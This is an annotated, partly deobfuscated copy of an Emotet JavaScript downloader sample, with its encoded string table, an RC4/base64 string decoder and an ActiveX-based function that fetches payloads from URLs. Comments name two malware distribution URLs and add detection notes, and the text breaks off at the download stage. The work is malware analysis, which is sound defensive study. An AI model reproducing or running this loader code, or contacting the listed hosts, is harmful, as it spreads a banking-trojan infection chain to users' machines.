- //From an Emotet .js file received on 4.26.2019
- //SHA256 A95B13778F1D7907C0F5E836597F056BABE04CF50A24143CBD0227F595C6A9BE
- //The emotet crew added a new layer of obfuscation and I was curious to see how it worked. This is heavily based upon the work done by Cofense: https://cofense.com/emotet-update-new-c2-communication-followed-new-infection-chain/
- //I just attempted to untangle the main decoder function.
- //Apologies in advance for any of my silly variable names.
- var hexArray = [
- '\x77\x36\x63\x35\x59\x73\x4f\x36\x44\x51\x3d\x3d',
- '\x49\x77\x51\x4b\x65\x48\x2f\x43\x68\x31\x64\x65\x64\x41\x56\x4d\x63\x33\x37\x43\x70\x51\x3d\x3d',
- '\x77\x37\x5a\x53\x77\x37\x6e\x44\x71\x63\x4f\x64',
- '\x4e\x68\x58\x44\x71\x77\x3d\x3d',
- '\x54\x43\x37\x44\x6d\x43\x76\x44\x73\x51\x3d\x3d',
- '\x66\x38\x4b\x68\x77\x72\x6c\x33\x5a\x41\x3d\x3d',
- '\x77\x35\x56\x76\x77\x72\x42\x33\x64\x67\x3d\x3d',
- '\x58\x54\x63\x70\x77\x36\x63\x3d',
- '\x62\x54\x44\x44\x71\x51\x33\x44\x6c\x51\x3d\x3d',
- '\x77\x35\x55\x51\x58\x63\x4f\x35',
- '\x41\x51\x59\x30\x56\x6d\x49\x3d',
- '\x77\x72\x5a\x59\x46\x6d\x5a\x58\x41\x41\x3d\x3d',
- '\x5a\x38\x4f\x4f\x44\x77\x54\x44\x6d\x67\x3d\x3d',
- '\x46\x6d\x7a\x44\x69\x4d\x4b\x4c\x43\x63\x4b\x6e\x77\x34\x66\x44\x76\x63\x4b\x2b\x4a\x6b\x52\x45',
- '\x77\x36\x7a\x43\x75\x6e\x50\x43\x71\x38\x4f\x70',
- '\x45\x77\x66\x43\x71\x42\x74\x48',
- '\x46\x4d\x4f\x4d\x77\x6f\x74\x48\x77\x36\x2f\x43\x75\x52\x6b\x69\x77\x71\x7a\x43\x6c\x73\x4b\x51\x77\x72\x58\x44\x73\x32\x62\x44\x6a\x38\x4b\x31',
- '\x4e\x38\x4b\x31\x57\x47\x7a\x44\x6e\x41\x3d\x3d',
- '\x66\x47\x30\x56\x77\x36\x55\x6e',
- '\x53\x56\x59\x6e\x77\x34\x6b\x64',
- '\x77\x72\x68\x4c\x63\x73\x4f\x61\x77\x36\x73\x3d',
- '\x65\x4d\x4f\x55\x56\x38\x4f\x6f\x4e\x51\x3d\x3d',
- '\x65\x63\x4f\x39\x77\x34\x4c\x43\x74\x73\x4b\x62',
- '\x61\x63\x4b\x4b\x47\x32\x50\x43\x68\x4d\x4f\x30\x77\x72\x55\x62\x55\x77\x3d\x3d',
- '\x53\x38\x4b\x6d\x77\x71\x34\x51\x49\x67\x3d\x3d',
- '\x77\x72\x4c\x43\x6e\x63\x4b\x6c\x77\x36\x2f\x44\x6a\x38\x4f\x73\x77\x6f\x6b\x77\x77\x35\x6e\x44\x6d\x45\x56\x57\x49\x77\x3d\x3d',
- '\x77\x6f\x4e\x4e\x52\x51\x34\x4c',
- '\x77\x72\x42\x4e\x49\x38\x4f\x38\x62\x77\x3d\x3d',
- '\x4c\x48\x33\x44\x6a\x38\x4b\x4c\x58\x4d\x4f\x6d\x77\x70\x76\x43\x72\x73\x4f\x4d\x63\x55\x52\x59\x61\x38\x4f\x64\x77\x6f\x77\x7a\x4f\x31\x4a\x76\x77\x72\x56\x49\x77\x34\x54\x44\x67\x38\x4f\x44\x65\x79\x62\x43\x72\x4d\x4f\x73\x77\x71\x62\x43\x6b\x63\x4f\x52\x66\x73\x4b\x38', //"http://608design.com/mainto/6Cgy/"
- '\x77\x36\x31\x6b\x77\x34\x44\x44\x75\x4d\x4f\x48',
- '\x77\x36\x50\x43\x73\x57\x33\x43\x71\x73\x4f\x70',
- '\x4d\x30\x76\x44\x71\x63\x4f\x59\x4c\x56\x50\x44\x6d\x33\x72\x44\x67\x42\x49\x6b\x77\x37\x49\x72\x57\x46\x44\x44\x6c\x73\x4f\x73\x4e\x6e\x7a\x44\x67\x6a\x5a\x4c\x77\x36\x4d\x7a\x4d\x6c\x39\x5a\x46\x6d\x31\x45\x77\x34\x63\x78\x4c\x51\x3d\x3d', //"https://cssshk.com/wp-admin/gz56/"
- '\x4c\x57\x72\x44\x76\x63\x4b\x59\x77\x34\x63\x3d',
- '\x59\x42\x39\x50\x77\x35\x68\x42',
- '\x4c\x73\x4b\x36\x77\x35\x4d\x64\x77\x36\x59\x3d',
- '\x77\x72\x78\x48\x77\x35\x7a\x44\x6c\x56\x63\x3d',
- '\x46\x77\x50\x44\x69\x44\x31\x71',
- '\x4e\x79\x72\x44\x74\x43\x46\x4a',
- '\x46\x44\x4c\x44\x6e\x6a\x68\x46',
- '\x77\x35\x52\x32\x56\x45\x31\x76',
- '\x4c\x73\x4b\x53\x77\x72\x6b\x50\x77\x72\x76\x44\x75\x6c\x35\x7a\x77\x72\x62\x44\x6f\x38\x4f\x38\x77\x36\x58\x44\x75\x33\x50\x43\x71\x63\x4f\x48\x77\x71\x6a\x43\x73\x63\x4f\x4c\x77\x6f\x55\x51\x77\x37\x6f\x62\x77\x35\x35\x36\x77\x35\x54\x44\x6a\x57\x48\x43\x75\x38\x4b\x6d\x77\x37\x59\x65\x77\x70\x55\x37\x77\x34\x62\x44\x71\x63\x4b\x53\x77\x34\x41\x54\x77\x72\x55\x48\x4b\x73\x4b\x54\x61\x52\x4c\x44\x74\x38\x4b\x75\x77\x36\x77\x46\x42\x73\x4b\x4b\x77\x6f\x72\x43\x72\x48\x51\x64\x77\x71\x68\x35\x77\x35\x66\x44\x70\x38\x4f\x45\x4f\x58\x41\x3d',
- '\x65\x73\x4b\x69\x53\x4d\x4b\x2b',
- '\x4c\x4d\x4b\x54\x58\x47\x73\x3d',
- '\x63\x48\x41\x46\x77\x37\x55\x54',
- '\x63\x73\x4b\x73\x77\x70\x35\x4e',
- '\x77\x35\x77\x70\x77\x35\x5a\x70\x77\x36\x34\x3d',
- '\x47\x38\x4f\x58\x77\x70\x56\x52\x77\x36\x38\x3d',
- '\x56\x42\x51\x37\x77\x35\x70\x2b',
- '\x4b\x38\x4f\x79\x53\x45\x44\x44\x69\x41\x3d\x3d',
- '\x77\x37\x6b\x77\x77\x34\x52\x77\x77\x35\x49\x3d',
- '\x4b\x38\x4f\x72\x77\x72\x39\x2b\x77\x37\x30\x3d',
- '\x77\x72\x5a\x63\x47\x33\x74\x57',
- '\x53\x73\x4b\x6a\x77\x72\x52\x59\x57\x41\x3d\x3d',
- '\x77\x6f\x4c\x44\x6c\x38\x4b\x2f\x63\x4d\x4b\x61',
- '\x77\x37\x63\x4a\x77\x35\x31\x62\x77\x34\x41\x3d',
- '\x77\x36\x38\x70\x77\x37\x4e\x55\x77\x36\x55\x3d',
- '\x59\x77\x6c\x4b\x77\x6f\x37\x43\x74\x51\x3d\x3d',
- '\x4e\x38\x4b\x2f\x52\x6c\x6a\x44\x6e\x51\x3d\x3d',
- '\x77\x6f\x66\x44\x6d\x38\x4b\x4d\x54\x63\x4b\x6d\x77\x6f\x73\x2f\x77\x71\x38\x6d\x45\x38\x4f\x74\x4a\x38\x4f\x55\x77\x70\x58\x43\x71\x56\x76\x44\x6c\x57\x72\x44\x75\x67\x3d\x3d',
- '\x77\x72\x35\x52\x57\x58\x46\x4e\x48\x53\x33\x44\x72\x44\x73\x54\x77\x71\x31\x56\x57\x6a\x4a\x64\x77\x6f\x6a\x44\x6e\x77\x78\x46\x61\x43\x66\x43\x72\x38\x4f\x4c\x77\x37\x68\x6f\x77\x34\x62\x44\x72\x4d\x4f\x4a\x45\x4d\x4b\x2f\x55\x78\x38\x3d',
- '\x62\x79\x39\x4e\x77\x72\x72\x43\x73\x52\x7a\x43\x76\x41\x3d\x3d',
- '\x45\x63\x4f\x57\x77\x6f\x74\x58\x77\x37\x54\x43\x76\x42\x4d\x3d',
- '\x77\x37\x51\x76\x77\x35\x4d\x3d',
- '\x47\x54\x59\x67\x57\x77\x3d\x3d',
- '\x77\x70\x54\x43\x73\x42\x6e\x43\x74\x4d\x4f\x76',
- '\x77\x35\x34\x54\x77\x35\x37\x44\x69\x41\x3d\x3d',
- '\x77\x35\x49\x50\x77\x34\x72\x44\x69\x4d\x4f\x47',
- '\x46\x38\x4f\x42\x77\x6f\x5a\x42\x77\x36\x76\x43\x70\x42\x38\x6a\x77\x36\x49\x3d',
- '\x57\x4d\x4f\x59\x77\x71\x78\x33\x42\x51\x3d\x3d',
- '\x5a\x38\x4f\x59\x77\x71\x35\x68\x49\x67\x3d\x3d',
- '\x66\x7a\x42\x50\x77\x71\x44\x43\x71\x67\x3d\x3d',
- '\x4a\x32\x62\x44\x6c\x63\x4b\x49\x43\x63\x4b\x6c\x77\x35\x45\x3d',
- '\x77\x71\x4e\x57\x49\x38\x4f\x4c\x57\x77\x3d\x3d',
- '\x44\x73\x4f\x6e\x62\x58\x7a\x44\x6a\x38\x4b\x71\x47\x77\x3d\x3d',
- '\x52\x63\x4f\x58\x77\x37\x76\x43\x69\x63\x4b\x4e\x77\x34\x54\x44\x6c\x4d\x4f\x72\x56\x51\x3d\x3d',
- '\x77\x72\x59\x49\x77\x36\x4c\x43\x67\x58\x6b\x3d',
- '\x77\x71\x5a\x44\x47\x57\x46\x4e\x48\x7a\x73\x3d',
- '\x65\x73\x4b\x69\x52\x38\x4b\x6c',
- '\x77\x35\x45\x55\x51\x63\x4f\x7a',
- '\x4f\x4d\x4b\x4f\x77\x35\x66\x44\x76\x51\x35\x73\x77\x36\x77\x3d',
- '\x77\x6f\x42\x54\x53\x73\x4f\x59\x77\x36\x67\x3d',
- '\x59\x56\x68\x41\x77\x71\x76\x44\x6e\x4d\x4b\x7a\x77\x37\x51\x3d',
- '\x77\x35\x52\x79\x77\x34\x6b\x3d',
- '\x53\x38\x4f\x66\x4e\x52\x37\x44\x72\x77\x3d\x3d',
- '\x42\x4d\x4f\x61\x77\x71\x39\x72\x77\x34\x45\x3d',
- '\x4e\x68\x5a\x62\x4b\x47\x63\x3d',
- '\x77\x70\x64\x6f\x66\x4d\x4f\x55\x77\x36\x59\x3d',
- '\x66\x73\x4f\x62\x77\x6f\x70\x67\x4c\x41\x3d\x3d',
- '\x57\x73\x4f\x52\x49\x53\x44\x44\x6f\x51\x3d\x3d',
- '\x77\x6f\x64\x78\x59\x4d\x4f\x4f\x77\x36\x38\x3d',
- '\x77\x70\x68\x70\x65\x67\x73\x61\x77\x36\x66\x43\x6b\x38\x4b\x35\x77\x72\x54\x44\x70\x38\x4f\x77\x77\x34\x67\x75\x53\x54\x6f\x51\x77\x71\x72\x44\x73\x4d\x4b\x6b\x43\x73\x4f\x76\x58\x73\x4f\x5a\x77\x36\x7a\x44\x67\x31\x77\x48\x4c\x73\x4b\x64\x77\x35\x45\x45\x77\x34\x56\x45\x52\x4d\x4f\x73\x66\x67\x64\x79\x77\x37\x7a\x43\x71\x56\x5a\x54\x77\x72\x48\x44\x72\x53\x4c\x44\x74\x6d\x7a\x43\x6b\x58\x46\x76\x49\x63\x4f\x79\x77\x6f\x2f\x44\x73\x43\x37\x44\x71\x31\x6e\x43\x6f\x73\x4f\x57\x77\x35\x42\x37\x47\x58\x6f\x45\x77\x72\x42\x6d\x4e\x73\x4f\x4f\x77\x72\x77\x4e\x45\x38\x4b\x52\x63\x73\x4f\x77\x4a\x77\x3d\x3d',
- '\x54\x38\x4f\x48\x63\x63\x4f\x4b\x48\x51\x3d\x3d',
- '\x77\x35\x48\x43\x70\x56\x33\x43\x6a\x38\x4f\x53',
- '\x4f\x46\x7a\x44\x75\x63\x4f\x4a\x4d\x51\x3d\x3d',
- '\x46\x63\x4b\x63\x77\x35\x63\x72\x77\x36\x59\x3d',
- '\x77\x70\x74\x6e\x77\x36\x6e\x44\x6a\x33\x6b\x3d',
- '\x54\x38\x4f\x6a\x77\x70\x70\x37\x43\x77\x3d\x3d',
- '\x53\x4d\x4f\x62\x77\x36\x7a\x43\x6e\x4d\x4f\x48\x77\x70\x2f\x43\x6b\x73\x4f\x6c\x53\x46\x68\x62\x77\x71\x78\x51\x62\x4d\x4f\x65\x57\x38\x4b\x74\x47\x38\x4b\x35\x59\x73\x4f\x54\x61\x73\x4b\x76\x77\x34\x4c\x43\x6b\x42\x78\x68\x59\x41\x3d\x3d',
- '\x58\x63\x4f\x66\x77\x6f\x46\x44\x4c\x67\x3d\x3d',
- '\x77\x34\x70\x71\x52\x51\x76\x44\x67\x67\x3d\x3d',
- '\x77\x37\x49\x6d\x52\x73\x4f\x53\x4f\x51\x3d\x3d',
- '\x64\x33\x45\x41\x77\x37\x78\x7a\x77\x36\x4c\x44\x76\x4d\x4f\x56\x4b\x63\x4f\x68\x4f\x38\x4f\x64\x4c\x38\x4f\x72\x77\x34\x4c\x43\x6b\x6c\x66\x44\x70\x45\x31\x6a\x4c\x73\x4b\x50\x50\x63\x4f\x4d\x58\x63\x4f\x46\x77\x34\x70\x68',
- '\x77\x34\x4e\x62\x66\x56\x46\x67',
- '\x62\x6e\x41\x34\x77\x35\x73\x48',
- '\x77\x71\x31\x58\x77\x35\x44\x44\x74\x48\x30\x3d',
- '\x4c\x31\x44\x44\x74\x73\x4b\x33\x45\x77\x3d\x3d',
- '\x77\x37\x70\x71\x55\x77\x50\x44\x6e\x63\x4b\x64\x77\x70\x76\x43\x69\x48\x62\x44\x6d\x6b\x6f\x71\x65\x73\x4f\x7a\x77\x72\x31\x4d\x77\x72\x50\x44\x6e\x31\x4c\x43\x6d\x63\x4b\x52\x77\x72\x2f\x43\x73\x73\x4f\x38\x77\x6f\x52\x41',
- '\x44\x38\x4b\x79\x77\x37\x76\x44\x70\x79\x4d\x3d',
- '\x61\x56\x77\x7a\x77\x35\x73\x37',
- '\x77\x37\x39\x36\x77\x71\x78\x63\x62\x51\x3d\x3d',
- '\x4a\x51\x50\x44\x76\x51\x64\x6a',
- '\x48\x47\x54\x43\x76\x69\x6c\x68',
- '\x77\x70\x45\x57\x43\x56\x33\x44\x6f\x63\x4b\x4c',
- '\x4c\x4d\x4b\x5a\x66\x47\x76\x44\x68\x4d\x4f\x68\x77\x36\x73\x41',
- '\x77\x35\x55\x41\x55\x63\x4f\x75\x46\x38\x4f\x4b',
- '\x51\x44\x49\x71\x55\x41\x3d\x3d',
- '\x77\x72\x64\x34\x65\x69\x67\x5a\x77\x72\x6a\x44\x6e\x38\x4f\x2f\x77\x72\x66\x44\x72\x73\x4f\x44\x77\x35\x4d\x72\x53\x79\x5a\x4d',
- '\x4c\x4d\x4b\x31\x77\x35\x62\x44\x68\x51\x6b\x3d',
- '\x77\x35\x58\x43\x72\x73\x4f\x51\x77\x34\x76\x43\x75\x77\x3d\x3d',
- '\x42\x55\x33\x44\x74\x4d\x4b\x2f\x4a\x4d\x4f\x6e\x77\x36\x66\x44\x72\x4d\x4b\x4f\x4c\x45\x46\x51',
- '\x64\x79\x39\x39\x77\x35\x64\x6e',
- '\x77\x36\x7a\x43\x6e\x42\x54\x44\x75\x73\x4b\x34',
- '\x4d\x31\x33\x44\x6c\x4d\x4b\x77\x44\x67\x3d\x3d',
- '\x77\x34\x50\x43\x71\x55\x72\x43\x76\x63\x4b\x39\x77\x34\x5a\x59\x77\x35\x56\x46\x77\x35\x48\x43\x75\x4d\x4f\x58\x77\x72\x78\x69\x77\x37\x49\x3d',
- '\x59\x4d\x4b\x38\x54\x63\x4b\x6a\x46\x67\x3d\x3d',
- '\x77\x37\x45\x48\x57\x73\x4f\x70\x42\x67\x3d\x3d',
- '\x66\x54\x63\x70\x77\x36\x63\x3d',
- '\x77\x70\x45\x42\x77\x36\x2f\x43\x68\x33\x73\x3d',
- '\x50\x4d\x4f\x48\x51\x6c\x66\x44\x70\x67\x3d\x3d',
- '\x77\x37\x55\x55\x52\x63\x4f\x34\x4e\x38\x4f\x58\x77\x71\x59\x2b\x77\x36\x68\x4b',
- '\x77\x36\x5a\x58\x51\x57\x4d\x3d',
- '\x51\x38\x4b\x6a\x55\x73\x4b\x6a\x46\x73\x4b\x74\x77\x37\x34\x64',
- '\x77\x6f\x56\x4a\x66\x4d\x4f\x2f\x77\x36\x6f\x3d',
- '\x52\x38\x4f\x61\x66\x63\x4f\x56\x48\x51\x3d\x3d',
- '\x54\x38\x4b\x63\x50\x78\x77\x6a',
- '\x53\x73\x4f\x6c\x56\x63\x4f\x4d\x4f\x47\x4c\x44\x67\x63\x4f\x2f\x50\x44\x72\x43\x6f\x38\x4f\x6a\x77\x71\x34\x3d',
- '\x54\x33\x51\x64\x77\x34\x73\x38',
- '\x53\x43\x68\x65\x77\x72\x4e\x54\x77\x72\x74\x39\x48\x63\x4f\x68\x77\x72\x6a\x44\x73\x4d\x4f\x6a\x4e\x4d\x4f\x6b\x77\x35\x6e\x44\x75\x6c\x48\x44\x69\x63\x4b\x55\x77\x35\x66\x44\x71\x38\x4b\x54\x46\x4d\x4b\x6a\x77\x35\x6f\x3d',
- '\x77\x72\x62\x44\x6a\x4d\x4b\x64\x57\x63\x4b\x67\x77\x6f\x42\x51\x77\x36\x55\x71\x41\x38\x4f\x67\x4d\x41\x3d\x3d',
- '\x77\x35\x50\x43\x73\x73\x4f\x79\x77\x36\x48\x43\x6c\x4d\x4f\x67\x77\x34\x35\x69\x77\x72\x72\x44\x6a\x42\x46\x47\x65\x67\x3d\x3d',
- '\x77\x36\x5a\x47\x56\x48\x52\x4c\x58\x73\x4b\x71\x77\x72\x49\x72\x55\x73\x4f\x72\x47\x77\x67\x71\x77\x70\x45\x68\x77\x35\x72\x44\x6d\x38\x4f\x77\x56\x4d\x4f\x50\x77\x34\x4d\x31\x55\x78\x6a\x43\x6b\x48\x62\x43\x76\x73\x4b\x5a\x57\x38\x4b\x51\x77\x37\x74\x50\x77\x6f\x6c\x55\x62\x38\x4f\x6c\x59\x73\x4f\x56\x66\x4d\x4b\x52\x42\x4d\x4b\x58\x77\x6f\x72\x44\x75\x6e\x41\x46\x57\x4d\x4f\x31\x77\x71\x64\x2f\x77\x37\x37\x43\x70\x63\x4b\x30\x77\x37\x77\x6f\x77\x71\x56\x75\x54\x32\x41\x72\x77\x34\x73\x67\x77\x6f\x5a\x57\x77\x71\x54\x43\x69\x46\x4d\x4d\x77\x36\x33\x44\x70\x63\x4f\x49\x77\x70\x2f\x43\x69\x73\x4f\x4e\x4a\x41\x48\x44\x73\x73\x4b\x6c\x77\x6f\x72\x43\x76\x6b\x66\x43\x70\x38\x4b\x33\x77\x71\x2f\x43\x6b\x67\x72\x44\x70\x63\x4b\x6c\x57\x48\x4e\x47\x49\x4d\x4f\x4c\x46\x45\x62\x44\x67\x58\x73\x6a\x4d\x4d\x4b\x64\x77\x34\x54\x43\x6c\x79\x44\x43\x6b\x73\x4f\x48\x77\x70\x52\x5a\x77\x6f\x77\x42\x77\x34\x44\x43\x70\x52\x42\x6a\x77\x6f\x73\x63\x77\x72\x77\x44\x77\x36\x72\x44\x71\x73\x4b\x32\x45\x67\x7a\x44\x76\x6a\x33\x43\x75\x42\x68\x61\x77\x6f\x54\x44\x6b\x55\x31\x41\x51\x52\x72\x43\x72\x7a\x72\x44\x6b\x63\x4f\x6d\x61\x69\x37\x43\x6d\x42\x4c\x43\x6b\x38\x4f\x2b\x77\x36\x4e\x69\x77\x35\x4d\x4c\x77\x70\x76\x43\x67\x73\x4b\x75\x64\x4d\x4b\x77\x64\x38\x4f\x67\x77\x35\x37\x44\x6f\x73\x4b\x78\x58\x45\x6e\x43\x6a\x4d\x4f\x44\x77\x71\x54\x44\x73\x4d\x4f\x48\x77\x35\x54\x44\x6a\x51\x3d\x3d',
- '\x77\x72\x4d\x47\x44\x6e\x37\x44\x75\x77\x3d\x3d',
- '\x5a\x73\x4b\x46\x77\x35\x34\x65\x53\x77\x3d\x3d',
- '\x46\x68\x7a\x43\x74\x6a\x42\x73',
- '\x49\x79\x58\x44\x6b\x51\x3d\x3d',
- '\x54\x63\x4f\x34\x77\x37\x76\x43\x70\x38\x4b\x78',
- '\x42\x77\x35\x2b\x41\x6e\x5a\x2b\x4d\x63\x4b\x45\x77\x35\x66\x44\x72\x38\x4f\x62\x61\x4d\x4b\x62\x77\x71\x56\x7a',
- '\x77\x36\x48\x43\x67\x6b\x4c\x43\x69\x73\x4f\x2f',
- '\x77\x35\x58\x43\x6e\x79\x72\x44\x76\x38\x4b\x41\x56\x57\x30\x3d',
- '\x77\x6f\x58\x44\x69\x38\x4b\x2b\x61\x63\x4b\x69',
- '\x49\x7a\x41\x57\x51\x48\x49\x3d',
- '\x59\x63\x4b\x75\x77\x6f\x68\x4c',
- '\x4a\x38\x4f\x4e\x54\x58\x6e\x44\x74\x77\x3d\x3d',
- '\x77\x37\x4c\x43\x74\x7a\x50\x44\x6f\x73\x4b\x52',
- '\x77\x34\x31\x73\x51\x78\x38\x3d',
- '\x49\x38\x4f\x44\x61\x33\x58\x44\x71\x67\x3d\x3d',
- '\x77\x72\x5a\x59\x46\x6d\x5a\x48\x50\x44\x7a\x44\x73\x69\x77\x46\x77\x72\x6f\x3d',
- '\x51\x73\x4b\x77\x77\x70\x39\x59\x65\x77\x3d\x3d',
- '\x77\x36\x64\x58\x77\x70\x4e\x35\x64\x73\x4b\x34',
- '\x54\x38\x4f\x46\x77\x71\x4e\x6e\x46\x43\x66\x43\x6e\x57\x52\x68\x77\x36\x31\x6b',
- '\x77\x37\x6c\x30\x77\x6f\x4a\x62\x56\x41\x3d\x3d',
- '\x5a\x38\x4b\x35\x77\x70\x31\x56\x52\x77\x3d\x3d',
- '\x42\x44\x5a\x79\x41\x56\x38\x3d',
- '\x55\x4d\x4f\x61\x77\x35\x37\x43\x76\x63\x4b\x4c',
- '\x77\x70\x59\x34\x55\x58\x6a\x43\x71\x38\x4f\x4d',
- '\x5a\x63\x4b\x6d\x77\x6f\x4e\x4b\x53\x73\x4f\x56\x77\x71\x37\x43\x68\x58\x54\x43\x6d\x73\x4b\x53',
- '\x44\x6c\x6a\x43\x6d\x77\x73\x3d',
- '\x77\x37\x39\x4a\x64\x58\x4e\x76',
- '\x77\x70\x62\x44\x6e\x38\x4b\x55\x56\x41\x3d\x3d',
- '\x51\x63\x4f\x4d\x77\x36\x7a\x43\x68\x63\x4b\x53\x77\x35\x34\x3d',
- '\x4c\x33\x58\x44\x6f\x38\x4b\x48\x77\x34\x72\x44\x6a\x56\x72\x43\x6e\x63\x4f\x78\x77\x70\x68\x42',
- '\x56\x4d\x4f\x6a\x46\x54\x7a\x44\x6c\x77\x3d\x3d',
- '\x53\x41\x64\x50\x77\x72\x72\x43\x75\x77\x3d\x3d',
- '\x77\x35\x56\x4a\x56\x48\x51\x3d',
- '\x77\x37\x56\x54\x77\x70\x46\x38\x59\x51\x3d\x3d',
- '\x53\x41\x78\x43\x77\x36\x6c\x4b',
- '\x64\x6a\x34\x2b\x77\x36\x68\x77'
- ];
- // String decoder used by every other function in this sample.
- // decoder(index, key) takes entry `index` of hexArray, base64-decodes it, reinterprets the bytes as UTF-8
- // and decrypts the result with RC4 under `key`. Every call site passes its own 4-character key, so a
- // single global key is not enough to recover all strings statically.
- // Analyst note: this function only reads hexArray, writes its own properties and (if missing) a global atob.
- // It does not touch WScript/ActiveX, so hexArray plus this function can be evaluated in an isolated
- // interpreter without Windows host objects to dump all strings; the rest of the script should not be run.
- var decoder = function (arrayIndex, extraHex) {
- // Call sites pass the index as a hex string such as '0x1c'; the subtraction coerces it to a number.
- arrayIndex = arrayIndex - 0x0;
- var indexValue = hexArray[arrayIndex];
- // One-time initialisation, guarded by the 'azsjga' flag that is set at the end of this branch.
- if (decoder['azsjga'] === undefined) {
- (function () {
- var _0x30ce4e;
- try {
- // Builds and runs "return (function() {}.constructor("return this")( ));" to get the global object.
- var _0xfb6156 = Function('return\x20(function()\x20' + '{}.constructor(\x22return\x20this\x22)(\x20)' + ');');
- _0x30ce4e = _0xfb6156();
- } catch (_0x181483) {
- _0x30ce4e = window;
- }
- var base64Chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
- // Installs a base64 decoder as global atob only when the host does not already provide one.
- _0x30ce4e['atob'] || (_0x30ce4e['atob'] = function (_0x59e0a0) {
- var _0x124a74 = String(_0x59e0a0)['replace'](/=+$/, '');
- for (var _0x1f24bd = 0x0, _0x1d00db, _0x2f8c13, _0x5c4866 = 0x0, _0x3a06ec = ''; _0x2f8c13 = _0x124a74['charAt'](_0x5c4866++); ~_0x2f8c13 && (_0x1d00db = _0x1f24bd % 0x4 ? _0x1d00db * 0x40 + _0x2f8c13 : _0x2f8c13, _0x1f24bd++ % 0x4) ? _0x3a06ec += String['fromCharCode'](0xff & _0x1d00db >> (-0x2 * _0x1f24bd & 0x6)) : 0x0) {
- _0x2f8c13 = base64Chars['indexOf'](_0x2f8c13);
- }
- return _0x3a06ec;
- });
- }());
- // decodeString(encodedString, extraHex): base64 -> UTF-8 text -> RC4 with extraHex as the key.
- var decodeString = function (encodedString, extraHex) {
- var array1 = [], var1 = 0x0, var2, var3 = '', uriString = '';
- encodedString = atob(encodedString); //decode base-64 encoded string
- //Turn each decoded byte into a two-digit hex value (toString(0x10), left-padded with '0') prefixed with %, then let decodeURIComponent read the percent-encoded bytes as UTF-8.
- for (var count = 0x0, base64StringLength = encodedString['length']; count < base64StringLength; count++) {
- uriString += '%' + ('00' + encodedString['charCodeAt'](count)['toString'](0x10))['slice'](-0x2);
- }
- encodedString = decodeURIComponent(uriString);
- //RC4 state: array1 is the S-box, initialised to the identity permutation 0..255
- for (var counter2 = 0x0; counter2 < 0x100; counter2++) {
- array1[counter2] = counter2;
- }
- for (counter2 = 0x0; counter2 < 0x100; counter2++) {
- //RC4 key scheduling: var1 = (var1 + S[i] + key[i mod keyLength]) mod 256, then swap S[i] and S[var1]. extraHex is the key.
- var1 = (var1 + array1[counter2] + extraHex['charCodeAt'](counter2 % extraHex['length'])) % 0x100;
- var2 = array1[counter2];
- array1[counter2] = array1[var1]; //swap, step 1: S[i] takes S[var1]
- array1[var1] = var2; //swap, step 2: S[var1] takes the old S[i]
- }
- counter2 = 0x0; //reset i for the keystream phase
- var1 = 0x0; //reset j for the keystream phase
- //RC4 keystream generation: one keystream byte per input character, XORed with that character's code
- for (var counter3 = 0x0; counter3 < encodedString['length']; counter3++) {
- counter2 = (counter2 + 0x1) % 0x100;
- var1 = (var1 + array1[counter2]) % 0x100;
- var2 = array1[counter2];
- array1[counter2] = array1[var1];
- array1[var1] = var2;
- var3 += String['fromCharCode'](encodedString['charCodeAt'](counter3) ^ array1[(array1[counter2] + array1[var1]) % 0x100]);
- }
- return var3;
- };
- // 'rjrlla' holds the decode routine, 'buKkqm' the per-index cache of decoded strings, 'azsjga' the init flag.
- decoder['rjrlla'] = decodeString;
- decoder['buKkqm'] = {};
- decoder['azsjga'] = !![];
- }
- // The cache is keyed by index only: if an index were requested again with a different key,
- // the first decoded value would be returned and the new key ignored.
- var _0x442eaf = decoder['buKkqm'][arrayIndex];
- if (_0x442eaf === undefined) {
- // 'sDKOfx' is set here but never read in the code shown on this page.
- if (decoder['sDKOfx'] === undefined) {
- decoder['sDKOfx'] = !![];
- }
- indexValue = decoder['rjrlla'](indexValue, extraHex);
- decoder['buKkqm'][arrayIndex] = indexValue;
- } else {
- indexValue = _0x442eaf;
- }
- return indexValue;
- };
- // Fetches `url` through a COM object and reports the outcome to responseHandler(body, errorFlag).
- // responseHandler receives (responseBody, false) when the checked property equals 0xc8 (200),
- // and (null, true) for any other value or when anything in the try block throws.
- // All ProgIDs, method names and property names are produced by decoder() at run time and are not visible here.
- // NOTE(review): the call shapes (3-argument call with `url` and false, then a no-argument call, then a
- // comparison with 200) match open(method, url, async=false) / send() / status on an XMLHTTP-style object;
- // confirm against the decoded strings.
- // Detection note: a script host creating an HTTP COM object and then writing and launching a file is the
- // behaviour worth alerting on, independent of the URLs in this particular sample.
- function getDataFromUrl(url, responseHandler) {
- // Lookup table produced by the obfuscator: two decoded strings plus trivial wrappers for `==` and a 2-argument call.
- // The reads below use different index/key pairs than the writes; presumably they decode to the same property names.
- var _0xc3557f = {};
- _0xc3557f[decoder('0x0', '\x62\x4d\x52\x73')] = decoder('0x1', '\x71\x5d\x29\x4c');
- _0xc3557f[decoder('0x2', '\x31\x5d\x41\x71')] = decoder('0x3', '\x4c\x64\x6a\x4e');
- _0xc3557f[decoder('0x4', '\x78\x6e\x76\x4b')] = function (_0x2a5334, _0x363968) {
- return _0x2a5334 == _0x363968;
- };
- _0xc3557f[decoder('0x5', '\x34\x2a\x50\x41')] = function (_0x257d9f, _0x363b24, _0x5e2eaa) {
- return _0x257d9f(_0x363b24, _0x5e2eaa);
- };
- try {
- var xmlHttpObject = new ActiveXObject(_0xc3557f[decoder('0x6', '\x2a\x6d\x78\x6e')]);
- // Third argument is false (![]), so the request is presumably synchronous.
- xmlHttpObject[decoder('0x7', '\x4a\x5b\x55\x23')](_0xc3557f[decoder('0x8', '\x78\x6e\x76\x4b')], url, ![]);
- xmlHttpObject[decoder('0x9', '\x62\x4d\x52\x73')]();
- // 0xc8 is 200.
- if (_0xc3557f[decoder('0xa', '\x71\x5d\x29\x4c')](xmlHttpObject[decoder('0xb', '\x68\x26\x40\x48')], 0xc8)) {
- return _0xc3557f[decoder('0xc', '\x4e\x74\x4d\x5b')](responseHandler, xmlHttpObject[decoder('0xd', '\x26\x47\x21\x63')], ![]);
- } else {
- return _0xc3557f[decoder('0xe', '\x35\x54\x37\x4e')](responseHandler, null, !![]);
- }
- } catch (e) {
- // Any failure (object creation, request, property access) is reported as an error, not rethrown.
- return responseHandler(null, !![]);
- }
- }
- // Download stage: tries a chain of URLs one after another and hands the first successful response body
